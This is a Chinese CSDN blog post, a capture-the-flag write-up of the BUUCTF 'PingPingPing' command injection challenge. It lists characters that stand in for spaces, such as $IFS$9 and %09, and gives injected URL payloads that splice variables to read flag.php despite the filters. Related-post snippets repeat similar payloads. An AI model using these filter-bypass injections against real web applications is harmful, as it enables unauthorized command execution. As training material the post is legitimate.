PingPingPing

已于 2023-04-17 10:58:15 修改
阅读量396 收藏
点赞数 1
文章标签: php 开发语言 Powered by 金山文档
于 2023-04-17 08:31:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49893996/article/details/130189459
版权

拿到题的时候我是没有丝毫的思路,可能是没有做过太多命令注入的题目,所以反应不过来

还是查看的别人的wp,得知这是一道有关命令注入的题目

通过页面提示传入ip并且利用管道符查看所有文件

但是当我们查看flag.php的时候发现页面过滤掉了空格

空格可以用以下字符代替:

< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}等

结果又对符号进行了过滤,替换成$IFS$9试试

发现直接把flag给过滤掉了,我去

还是先查看一下index.php吧

查看出来应该是PHP源码,大部分可以了解到是利用正则表达式匹配字符,过滤掉,加上一个对flag的贪婪匹配,尽可能多的匹配任何以flag出现的字符串

通过查看wp可以采取变量代替flag字符串,利用拼接实现功能

?ip=127.0.0.1;b=ag;a=fl;cat$IFS$1$a$b.php

还有一种是说,在源码中可以得知$a变量是可以被覆盖的

?ip=127.0.0.1;a=f;cat$IFS$1$alag.php
#无flag
?ip=127.0.0.1;a=l;cat$IFS$1f$aag.php
#无flag
?ip=127.0.0.1;a=a;cat$IFS$1fl$aag.php
#无flag
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
#有flag
?ip=127.0.0.1;a=fl;b=ag;cat$IFS$1$a$b.php
#无flag

陈艺秋
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
命令注入(DVWA+buuctf pingpingping
bin789456的博客
09-15 976
写在前面 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令的web应用中,如内容管理系统(CMS)等。 也就是在cmd等等命令行执行位置可以使用一些trick,自然你也会想到在CTF中会伴随一些关键字的屏蔽,当然也有一些绕过技巧。 这里主要是dvwa上的命令注入和一道CTF例题来说明 DVWA命令注入 后台代码并未对用户输入的参数ip的值进行过滤就直接与ping命令进行拼接
CTF学习第二十一站——BUUCTF的pingpingping与Exec
qq_41174589的博客
10-26 152
做了半天做不出来查了一下才知道这是linux系统下运行的。用$IFS绕一下空格看看源码里都ban了些啥。ban了好多哎,符号都不能用了,拼接一下逝逝。没反应莫慌,flag在页面源代码里aw。先用堆叠注入看一看同目录下有什么东西。发现一个flag,用cat访问一下。可恶找不到一点,逝一逝cat。这边也是找到flag了。看来ban掉了一些东西。查一下同目录下的文件。
buuctf pingpingping 过滤空格
obey77的博客
05-11 318
如果过滤了空格,可以使用: ①<> ②%20(space) ③%09(tab) ④$IFS$9、 ${IFS}、$IFS 例题:buu pingpingping 禁用了一些东西,比如flag 空格 :" ",(),<>,\,/ 于是用不了|cat flag 只能看看怎么绕过空格: ①<> ②%20(space) ③%09(tab) ④$IFS$9、 ${IFS}、$IFS 于是: 就得到了源码哈 然后想到拼接,a=fl;b=ag;之类的
BUU pingpingping WP
weixin_62472121的博客
06-01 538
buuctf pingpingping wp
BUUCTF - web - PingPingPing+Knife+Http
1tachi的博客
11-02 313
文章目录前言PingPingPing分析构造payload其他方法白给的shellHttpRepeater 前言 已经坚持了半个月了,有十多天一直在写杂项,直到学长委婉地告诉我杂项没啥技术性,就流量分析有点用,建议我学pwn,所以这几天我开始做web了 我会一直坚持下去 加油! PingPingPing 分析 想到昨天做了一个ping加Linux命令,今天这个也可以试试 ?ip=127.0.0.1|ls 尝试拿flag?ip=127.0.0.1|cat flag.php 看来空格被禁了,尝试绕过 换
Buuctf--pingpingping
qq_75120258的博客
10-23 118
内联执行法,就是先执行ls,再用cat把所有文件打开
BUUCTF Web pingpingping
CrotZZ的博客
07-03 454
打开后 没什么提示 试了下cat flag,空格好像是被过滤了 去空格,flag也被过滤 根据题目是ping 所以得先ip=127.0.0.1返回结果是这样的 ls看有什么文件,flag已经被过滤 试了下一些绕过空格的方法,得到index.php里面的内容,虽然有些看不懂但大致意思还是明白,空格、bash、命令里是否有flag 都被过滤 这里是用了echo$IFS9Y2F0IGZsYWcucGhw∣base649Y2F0IGZsYWcucGhw|base649Y2F0IGZsYWcucGh
rce漏洞试试看 buuctf的pingpingping 试试ctf的rce怎么样
helloKittywz的博客
06-10 458
然后我们可以看看index.php来看这个题是过滤了哪些东西,进行总结,也了解了解。先开始我读取index.php这个文件就不能进行读取,我还以为语法出现了错误。到时候在来看看,看看\这个转义特殊字符的,也就是进行强制转换的。也就是上一条的命令的输出结果作为下一条命令的输入。分析一下过滤哪些东西,在源码中可以明确的看出,,也就是说我们要进行绕过,然后我们使用。不行的时候在试试看。直接去看看flag可以读取不?flag所以知道了flag被过滤了。ls来看看,我们来看看有哪些文件。的那篇博客中,然后我们进行。
PHP编程开发工具有哪些?
红客网络编程与渗透技术
07-10 1013
PHP开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
什么是RPC?有哪些RPC框架?
yuiezt的专栏
07-09 1836
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 987
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 512
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
喰星云·数字化餐饮服务系统 多处 SQL注入漏洞复现
最新发布
0xSec
07-14 141
喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
深入探索Laravel框架中的Blade模板引擎
2402_85762143的博客
07-14 474
Blade是Laravel框架自带的模板引擎,它允许你使用纯PHP代码来编写HTML模板。Blade的语法非常简洁,它使用双大括号{{ }}来输出数据,使用三组大括号!!!来输出未转义的HTML内容,以及使用符号来定义控制结构,比如@foreach@if等。
使用SOAP与TrinityCore交互(待定)
skywalk8163的专栏
07-11 954
SOAP代表简单对象访问协议,是一种类似于REST的基于标准的web服务访问协议的旧形式。PHP提供了一些使此过程更容易的方法,但根据您的使用情况,您可能需要熟悉XML。考虑到您的特定RBAC访问配置,您还需要一个有权使用GM命令的用户帐户。专门为此目的创建一个受限访问帐户,而不是一个人使用的帐户,这可能是一个好主意。这将使用正确的HTTP方法(POST)以及“授权”和“正文”选项卡下的详细信息填充新集合。在Postman界面的右侧,一个符号将打开代码片段,可以将请求转换为您选择的语言
NSSCTF中24网安培训day1中web的题目
2302_78903258的博客
07-14 756
我又试了大小写,双写,特殊后缀名绕过的方法,发现均不能绕过,我们用.htaccess文件进行绕过,先上传一个.htaccess文件,文件内容<FilesMatch ¡°.jpg¡±>SetHandler application/x-httpd-php</FilesMatch> //这是把php文件都当作jpg的图片格式。,也就是说它执行了下面这句,那么我们还需要传flag参数。giveme=flag&flag=giveme,输入后,发现如下直接返回了flag,也就是说,代码退出了并输出了flag。
【pbootcms】新环境搭建环境安装时发生错误
艾塔SEO
07-11 170
至此测试成功,可以正常访问后台。新环境安装后台,第一时间替换授权代码,再进行其他操作。2、数据库信息是否替换(根目录下/config/database.php 文件)3、重新删除runtime目录(runtime文件夹为缓存文件夹)1、试着删除根目录下runtime目录,刷新页面重试。3、检查服务器环境pathinfo及伪静态规则配置;【pbootcms】新环境搭建环境安装时发生错误。2、检查系统会话文件存储目录是否具有写入权限;
网关、DHCP协议、ip地址、子网掩码简单介绍
mantouyouyou的博客
07-11 1243
参考文章:https://baike.baidu.com/item/%E7%BD%91%E5%85%B3/98992?fr=ge_ala。
pingpingping
08-26
我了解你的问题是关于pingpingping的。在题目中,当我们输入127.0.0.1时,会执行ping命令。如果我们想要获取flag,可以尝试以下payloads: - ?ip=127.0.0.1;cat /flag - ?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 这些payloads可以通过传入特定的参数来执行对应的命令,从而获取flag。希望对你有帮助!<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [[GXYCTF 2019]Ping Ping Ping](https://blog.csdn.net/m0_62422842/article/details/124616206)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [[GXYCTF2019]Ping Ping Ping(RCE)](https://blog.csdn.net/weixin_44348894/article/details/105352676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值